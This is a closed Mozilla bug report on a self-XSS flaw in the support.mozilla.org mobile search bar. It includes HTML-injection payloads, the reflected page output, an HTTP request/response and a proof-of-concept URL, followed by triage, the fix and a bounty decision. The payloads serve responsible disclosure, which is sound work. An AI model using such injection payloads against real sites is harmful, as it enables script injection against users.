Closed Bug 1238252 Opened 8 years ago Closed 8 years ago

Self-XSS in support.mozilla.org Mobile Site's Main Search Bar

Categories

(support.mozilla.org :: General, defect)

defect
Not set
normal

Tracking

(Not tracked)

VERIFIED FIXED

People

(Reporter: justashar, Assigned: mythmon)

References

Details

(Keywords: sec-low, wsec-selfxss)

Attachments

(1 file)

User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36

Steps to reproduce:

Hi,

I had found a XSS in support.mozilla.org Mobile Site's Main Search Bar. Open the following URL in any browser:

https://support.mozilla.org/en-US/questions/new/desktop/download-and-install/form?&mobile=1

The site provides a search facility. Inject the following XSS payload in search bar and hit enter.

'"><img src=x onerror=prompt(document.domain);> 




Actual results:

The site executes JavaScript code. The screen-shot is also attached.


Expected results:

There is no output encoding at this time.
Ashar - Thank you for filing this bug regarding the suppoort search functionality.  I have been able to replicate the behavior you suggested and will be performing some additional testing to understand it's exploitability for our users.  I will add any additional details I find to this bug.
Safe injection: '"><img src=x onerror=alert('xss');> 

Resulting HTML response containing multiple copies of original injection without output encoding:

</div><div class="results wrapper slide-on-exposed" id="instant-search-content">
  <ol class="search-results">
    
      <li class="document">
        <a href="/en-US/kb/email-notifications-and-inbox-sync?&amp;s='"><img src="x" onerror="alert('xss');"> &amp;as=s&amp;__keywords=true"&gt;
          <span class="title">Email notifications and inbox sync</span>
          Never miss an email again! Here's how to set notifications and sync preferences on your Firefox OS device.
        </a>
      </li>
    
      <li class="document">
        <a href="/en-US/kb/x-ray-goggles?&amp;s='"><img src="x" onerror="alert('xss');"> &amp;as=s&amp;__keywords=true"&gt;
          <span class="title">What is X-Ray Goggles</span>
          <b>X</b>-Ray Goggles allow you to see the building blocks that make up websites on the internet, and then remix them into new creations.
        </a>
      </li>
    
      <li class="document">
        <a href="/en-US/kb/how-customize-new-mail-sound?&amp;s='"><img src="x" onerror="alert('xss');"> &amp;as=s&amp;__keywords=true"&gt;
          <span class="title">How to Customize the New Mail Sound</span>
          A how-to article on customizing the sound that plays when a new email message is downloaded.
        </a>
      </li>
    
      <li class="document">
        <a href="/en-US/kb/firefox-no-longer-works-mac-os-x-10-5?&amp;s='"><img src="x" onerror="alert('xss');"> &amp;as=s&amp;__keywords=true"&gt;
          <span class="title">Firefox no longer works with Mac OS X 10.5</span>
          Firefox 16 is the last version of Firefox that works on Mac OS <b>X</b> 10.5 (Leopard).  To stay safe online, we recommend upgrading your computer or operating system.
        </a>
      </li>
    
      <li class="document">
        <a href="/en-US/kb/install-x-ray-goggles?&amp;s='"><img src="x" onerror="alert('xss');"> &amp;as=s&amp;__keywords=true"&gt;
          <span class="title">How to Install X-Ray Goggles</span>
          Installing <b>X</b>-Ray Goggles is easy. You can then poke around on any web page and transform it into your own creation! Here's how.
        </a>
      </li>
    
      <li class="document">
        <a href="/en-US/kb/firefox-no-longer-works-mac-os-10-4-or-powerpc?&amp;s='"><img src="x" onerror="alert('xss');"> &amp;as=s&amp;__keywords=true"&gt;
          <span class="title">Firefox no longer works with Mac OS X 10.4 or PowerPC processors</span>
          Firefox 3.6.28 is the last Firefox version to work on Mac OS <b>X</b> 10.4 or on Mac OS <b>X</b> 10.5 with a PowerPC Mac.  Switch to a newer computer to stay safe online.
        </a>
      </li>
    
      <li class="document">
        <a href="/en-US/kb/scrolling-issue-firefox-os-x-mavericks?&amp;s='"><img src="x" onerror="alert('xss');"> &amp;as=s&amp;__keywords=true"&gt;
          <span class="title">Scrolling issue on Firefox after upgrading to OS X Mavericks</span>
          This article shows you how to address scrolling issue caused by upgrading to OS <b>X</b> Mavericks.
        </a>
      </li>
    
      <li class="document">
        <a href="/en-US/kb/ringer-sound-and-vibrate-settings?&amp;s='"><img src="x" onerror="alert('xss');"> &amp;as=s&amp;__keywords=true"&gt;
          <span class="title">Ringer, sound and vibrate settings</span>
          Learn how to change your <b>alerts</b> or ringtones, add songs as ringtones, or turn your phone on vibrate or silent mode.
        </a>
      </li>
    
      <li class="document">
        <a href="/en-US/kb/inspecting-and-remixing-your-first-web-page?&amp;s='"><img src="x" onerror="alert('xss');"> &amp;as=s&amp;__keywords=true"&gt;
          <span class="title">Inspecting and remixing your first web page</span>
          <b>X</b>-Ray Goggles lets you poke around the elements of a web page and remix them into new creations. Learn how to swap images, text, and more.
        </a>
      </li>
    
      <li class="document">
        <a href="/en-US/kb/am-i-really-hacking?&amp;s='"><img src="x" onerror="alert('xss');"> &amp;as=s&amp;__keywords=true"&gt;
          <span class="title">Am I really hacking a web page?</span>
          Understand the difference between hacking with <b>X</b>-Ray Goggles, where you fork a copy of a webpage, versus the general term "hacking" where you break into a page.
        </a>
      </li>
    
  </ol>

</div>
Yes. The reflection of injection in DOM appears so many times and there is no output encoding ...
Summary: XSS in support.mozilla.org Mobile Site's Main Search Bar → DOM-based XSS in support.mozilla.org Mobile Site's Main Search Bar
Ashar - Although I agree there is a lack of output encoding here, which should be fixed, I cannot see a reasonable mechanism for an attacker to leverage such a payload in a practical manner.  This seems like the only reasonable exploitation vector would be for a user to be tricked into typing a malicious payload into the search bar rather than a malicious link in say a phishing scam.  Do you agree?  If not, could you explain and perhaps provide an example case that would suggest further impact?

Again, many thanks for this submission!
In other words, I'm suggesting that the exploitation vector is limited to Self-XSS (https://en.wikipedia.org/wiki/Self-XSS), but would like your feedback to make sure we're in sync with our understanding.
You're right. It is Self-XSS but I hope it will be fixed.
Keywords: sec-low, wsec-xss
Summary: DOM-based XSS in support.mozilla.org Mobile Site's Main Search Bar → Self-XSS in support.mozilla.org Mobile Site's Main Search Bar
HTTP Request:

GET /en-US/search?format=json&undefined=%27%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%27xss%27)%3B%3E+&q=%27%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%27xss%27)%3B%3E+ HTTP/1.1
Host: support.mozilla.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://support.mozilla.org/en-US/questions/new/desktop/download-and-install/form?&mobile=1
***REDACTED_SESSION_DATA***
X-Requested-With: XMLHttpRequest
Connection: close

HTTP Response:

HTTP/1.1 200 OK
Server: Apache
Vary: X-Mobile,User-Agent
X-Backend-Server: support2.webapp.phx1.mozilla.com
Cache-Control: no-cache, must-revalidate
Content-Type: application/json
Strict-Transport-Security: max-age=31536000
Public-Key-Pins: max-age=1296000; pin-sha256="r/mIkG3eEpVdm+u/ko/cwxzOMo1bk4TyHIlByibiA5E="; pin-sha256="WoiWRyIOVNa9ihaBciRSC7XHjliYS9VwUGOIud4PB18=";
Date: Mon, 11 Jan 2016 15:55:39 GMT
Keep-Alive: timeout=5, max=864
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-XSS-Protection: 1; mode=block
Pragma: no-cache
X-Content-Type-Options: nosniff
Connection: close
X-Robots-Tag: noodp
X-Frame-Options: DENY
X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
Content-Length: 4288

{"q":"'\"><img src=x onerror=alert('xss');> ","fallback_results":null,"pagination":{"has_next":true,"span":4,"url":"https://support.mozilla.org/en-US/search?q=%27%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%27xss%27%29%3B%3E+&undefined=%27%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%27xss%27%29%3B%3E+&format=json","max":10,"number":1,"page_range":[1,2,3,4,5,6,7,8],"has_previous":false,"dotted_upper":true,"num_pages":47,"dotted_lower":false},"total":10,"num_results":467,"w":1,"products":[{"slug":"firefox","title":"Firefox"},{"slug":"mobile","title":"Firefox for Android"},{"slug":"ios","title":"Firefox for iOS"},{"slug":"firefox-os","title":"Firefox OS"},{"slug":"focus-firefox","title":"Focus by Firefox"},{"slug":"thunderbird","title":"Thunderbird"},{"slug":"webmaker","title":"Webmaker"}],"product_titles":"All Products","results":[{"search_summary":"Never miss an email again! Here's how to set notifications and sync preferences on your Firefox OS device.","title":"Email notifications and inbox sync","url":"/en-US/kb/email-notifications-and-inbox-sync","explanation":"","rank":1,"score":0.027203325,"type":"document","id":19233},{"search_summary":"<b>X</b>-Ray Goggles allow you to see the building blocks that make up websites on the internet, and then remix them into new creations.","title":"What is X-Ray Goggles","url":"/en-US/kb/x-ray-goggles","explanation":"","rank":2,"score":0.010656366,"type":"document","id":14438},{"search_summary":"Firefox 16 is the last version of Firefox that works on Mac OS <b>X</b> 10.5 (Leopard).  To stay safe online, we recommend upgrading your computer or operating system.","title":"Firefox no longer works with Mac OS X 10.5","url":"/en-US/kb/firefox-no-longer-works-mac-os-x-10-5","explanation":"","rank":3,"score":0.009599386,"type":"document","id":11507},{"search_summary":"Installing <b>X</b>-Ray Goggles is easy. You can then poke around on any web page and transform it into your own creation! Here's how.","title":"How to Install X-Ray Goggles","url":"/en-US/kb/install-x-ray-goggles","explanation":"","rank":4,"score":0.009551151,"type":"document","id":14865},{"search_summary":"A how-to article on customizing the sound that plays when a new email message is downloaded.","title":"How to Customize the New Mail Sound","url":"/en-US/kb/how-customize-new-mail-sound","explanation":"","rank":5,"score":0.009239691,"type":"document","id":17203},{"search_summary":"Firefox 3.6.28 is the last Firefox version to work on Mac OS <b>X</b> 10.4 or on Mac OS <b>X</b> 10.5 with a PowerPC Mac.  Switch to a newer computer to stay safe online.","title":"Firefox no longer works with Mac OS X 10.4 or PowerPC processors","url":"/en-US/kb/firefox-no-longer-works-mac-os-10-4-or-powerpc","explanation":"","rank":6,"score":0.008637331,"type":"document","id":9263},{"search_summary":"This article shows you how to address scrolling issue caused by upgrading to OS <b>X</b> Mavericks.","title":"Scrolling issue on Firefox after upgrading to OS X Mavericks","url":"/en-US/kb/scrolling-issue-firefox-os-x-mavericks","explanation":"","rank":7,"score":0.0076004304,"type":"document","id":20117},{"search_summary":"Learn how to change your <b>alerts</b> or ringtones, add songs as ringtones, or turn your phone on vibrate or silent mode.","title":"Ringer, sound and vibrate settings","url":"/en-US/kb/ringer-sound-and-vibrate-settings","explanation":"","rank":8,"score":0.0020853204,"type":"document","id":13218},{"search_summary":"<b>X</b>-Ray Goggles lets you poke around the elements of a web page and remix them into new creations. Learn how to swap images, text, and more.","title":"Inspecting and remixing your first web page","url":"/en-US/kb/inspecting-and-remixing-your-first-web-page","explanation":"","rank":9,"score":0.00095560943,"type":"document","id":14439},{"search_summary":"On Mac OS <b>X</b> 10.9.5 or higher, Apple shows a security warning for apps that are not installed through the App Store. Follow these steps if you see the warning while trying to open a Firefox Marketplace app.","title":"How do I change my Mac Security Settings so I can open Firefox Marketplace apps?","url":"/en-US/kb/mac-security-settings-firefox-marketplace","explanation":"","rank":10,"score":0.00094013184,"type":"document","id":24236}],"lang_name":"English"}
In the above provided request/response, this demonstrates that the request generated by the mobile search bar is generating a JSON typed response, which contains the reflected values that were injected.  This I suspect is then interpreted by the application resulting in the self-XSS.  If an attacker attempted to weaponize this, via a get URL, this should just result in a JSON response in the browser.

Here's an example GET-based PoC that demonstrates this:

https://support.mozilla.org/en-US/search?format=json&undefined=%27%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%27xss%27%29%3B%3E+&q=%27%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%27xss%27%29%3B%3E+

The resulting browser would attempt to parse the JSON and would fail to validate.
The resulting response page has been served with a proper content type i.e., Content-Type:application/json and that's why XSS will not work as far as modern browsers are concerned. The only option left is Self-XSS.
mythmon: Can you have a look at this? Looks like we could improve some of the output encoding for the mobile components of search in support.mozilla.org and address this.
Flags: needinfo?(mcooper)
Jonathan: At first glance, this seems to be a similar issue to bug 1223970. Like in that bug, the search API should not HTML encode the results because those results may be consumed in other contexts. Instead the JS running on the page should be responsible for escaping the content. It should be an easy fix for us to avoid the self-XSS.
Flags: needinfo?(mcooper)
mythmon: that's great, thanks! I agree that JS running on the page should be safely handling the JSON content.
Without mentioning the details (where and how), I only mentioned the bug. Is there something wrong?
PR with a fix here (unmerged, and undeployed): https://github.com/mozilla/kitsune/pull/2771
Is it gonna be fixed?
Ashar - No, there is nothing wrong.  It's our preference that we not share anything about a security bug until it's fixed and published.  I was linking your blog post above for context so those working this bug are aware of it's presence.

Lnazi - Yes, it sounds like it's going to be fixed.  See above for mythmon's PR, which is pending review.
Jonathan- Great :) . the mobile version of Mozilla.org  needs to be fixed because I stumbled upon a few more vulnerabilities which I will post soon
:( mine is duplicate?
Lnazi - yes, #1238547 is a duplicate, meaning that both submissions target the same code deficiency in the same way (despite variations in the XSS payload).
What are requirements for bounties or hof?
Is there any chance for my bugs?
Lnazi - Please see this page for sites and bug types that would be eligible for bounties => https://www.mozilla.org/en-US/security/bug-bounty/faq-webapp/#eligible-bugs
Mine is xss (Dom based)  so do u think there s any chance of bounty? And when will the security team take action for it?
Lnazi - You are not likely to receive a bounty for #1238547 because Ashar reported this issue first in #1238252.
Status: UNCONFIRMED → NEW
Ever confirmed: true
Assignee: nobody → rdalal
Status: NEW → ASSIGNED
Assignee: rdalal → mcooper
The fix for this has been pushed to production.
Status: ASSIGNED → RESOLVED
Closed: 8 years ago
Resolution: --- → FIXED
Good. I checked and it is fixed now.
Status: RESOLVED → VERIFIED
Flags: sec-bounty?
This is a self-XSS and rated sec-low as a result. This is not eligible for a bug bounty.
Flags: sec-bounty? → sec-bounty-
Group: websites-security
Keywords: wsec-xsswsec-selfxss
You need to log in before you can comment on or make changes to this bug.